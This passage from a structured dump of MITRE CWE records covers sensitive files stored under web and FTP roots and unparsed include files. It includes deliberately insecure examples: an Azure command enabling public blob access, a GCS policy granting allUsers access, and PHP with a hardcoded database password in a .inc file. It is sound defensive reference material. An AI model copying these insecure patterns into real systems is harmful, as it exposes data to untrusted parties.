"Ordinal": null,
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following Azure command updates the settings for a storage account:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\taz storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access true\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "However, \"Allow Blob Public Access\" is set to true, meaning that anonymous/public users can access blobs.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The command could be modified to disable \"Allow Blob Public Access\" by setting it to false.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\taz storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access false\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Good",
"Reference": null
}
],
"ID": "DX-160"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following Google Cloud Storage command gets the settings for a storage account named 'BUCKET_NAME':",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t gsutil iam get gs://BUCKET_NAME\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Informative",
"Reference": null
},
{
"BodyText": "Suppose the command returns the following result:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "{\n\n```\n\t \"bindings\":[{\n\t\t \"members\":[\n\t\t\t \"projectEditor: PROJECT-ID\",\n\t\t\t \"projectOwner: PROJECT-ID\" \n\t\t ],\n\t\t \"role\":\"roles/storage.legacyBucketOwner\"\n\t },\n\t {\n\t\t \"members\":[ \n\t\t\t \"allUsers\",\n\t\t\t \"projectViewer: PROJECT-ID\"\n\t\t\t ],\n\t\t\t \"role\":\"roles/storage.legacyBucketReader\"\n\t\t }\n\t ]\n }\n```",
"IntroText": null,
"Language": "JSON",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This result includes the \"allUsers\" or IAM role added as members, causing this policy configuration to allow public access to cloud storage resources. There would be a similar concern if \"allAuthenticatedUsers\" was present.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The command could be modified to remove \"allUsers\" and/or \"allAuthenticatedUsers\" as follows:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "gsutil iam ch -d allUsers gs://BUCKET_NAME\n gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME",
"IntroText": null,
"Language": "Shell",
"Nature": "Good",
"Reference": null
}
],
"ID": "DX-161"
}
] | null | null | null | null | 2
|
[
[
"664",
"668",
"552"
],
[
"284",
"285",
"552"
]
] |
[
"219",
"220",
"527",
"528",
"529",
"530",
"539",
"553"
] |
219
|
Storage of File with Sensitive Data Under Web Root
|
Variant
|
Simple
|
Draft
|
The product stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.
|
Besides public-facing web pages and code, products may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server. If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.",
"Phase": "Operation"
},
{
"Note": "COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Avoid storing information under the web root directory.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation",
"System Configuration"
],
"Strategy": null
},
{
"Description": "Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the web directory.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
}
] |
[
{
"Description": "Data file under web root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1835",
"Reference": "CVE-2005-1835"
},
{
"Description": "Data file under web root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2217",
"Reference": "CVE-2005-2217"
},
{
"Description": "Username/password in data file under web root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1449",
"Reference": "CVE-2002-1449"
},
{
"Description": "Database file under web root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-0943",
"Reference": "CVE-2002-0943"
},
{
"Description": "database file under web root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1645",
"Reference": "CVE-2005-1645"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Sensitive Data Under Web Root",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "A10",
"EntryName": "Insecure Configuration Management",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2004"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Suggested OWASP Top Ten 2004 mapping",
"ModificationDate": "2008-08-15",
"ModificationName": null,
"ModificationOrganization": "Veracode",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-24",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Sensitive Data Under Web Root",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "552",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"219"
],
[
"284",
"285",
"552",
"219"
]
] |
[
"433"
] |
433
|
Unparsed Raw Web Content Delivery
|
Variant
|
Simple
|
Incomplete
|
The product stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server.
|
If code is stored in a file with an extension such as ".inc" or ".pl", and the web server does not have a handler for that extension, then the server will likely send the contents of the file directly to the requester without the pre-processing that was expected. When that file contains sensitive information such as database credentials, this may allow the attacker to compromise the application or associated components.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Perform a type check before interpreting files.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Do not store sensitive information in files which may be misinterpreted.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "\".inc\" file stored under web document root and returned unparsed by the server",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1886",
"Reference": "CVE-2002-1886"
},
{
"Description": "\".inc\" file stored under web document root and returned unparsed by the server",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-2065",
"Reference": "CVE-2002-2065"
},
{
"Description": "\".inc\" file stored under web document root and returned unparsed by the server",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2029",
"Reference": "CVE-2005-2029"
},
{
"Description": "direct request to .pl file leaves it unparsed",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0330",
"Reference": "CVE-2001-0330"
},
{
"Description": ".inc file",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-0614",
"Reference": "CVE-2002-0614"
},
{
"Description": "unparsed config.conf file",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2353",
"Reference": "CVE-2004-2353"
},
{
"Description": "Chain: uppercase file extensions causes web server to return script source code instead of executing the script.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-3365",
"Reference": "CVE-2007-3365"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Unparsed Raw Web Content Delivery",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null |
[
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 3, \"File Handlers\", Page 74",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] |
[
{
"Note": "This overlaps direct requests (CWE-425), alternate path (CWE-424), permissions (CWE-275), and sensitive file under web root (CWE-219).",
"Type": "Relationship"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Other_Notes, Relationship_Notes",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Potential_Mitigations",
"ModificationDate": "2010-09-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Observed_Examples",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "219",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code uses an include file to store database credentials:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "database.inc",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<?php\n\t$dbName = 'usersDB';\n\t$dbPassword = 'skjdh#67nkjd3$3$';\n\t?>\n```",
"IntroText": null,
"Language": "PHP",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "login.php",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<?php\n\tinclude('database.inc');\n\t$db = connectToDB($dbName, $dbPassword);\n\t$db.authenticateUser($username, $password);\n\t?>\n```",
"IntroText": null,
"Language": "PHP",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-104"
}
] | null | null | null | null | 2
|
[
[
"664",
"668",
"552",
"219",
"433"
],
[
"284",
"285",
"552",
"219",
"433"
]
] |
[] |
220
|
Storage of File With Sensitive Data Under FTP Root
|
Variant
|
Simple
|
Draft
|
The product stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Operation"
},
{
"Note": "COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Avoid storing information under the FTP root directory.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation",
"System Configuration"
],
"Strategy": null
},
{
"Description": "Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the FTP directory.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
}
] | null | null |
[
{
"EntryID": null,
"EntryName": "Sensitive Data Under FTP Root",
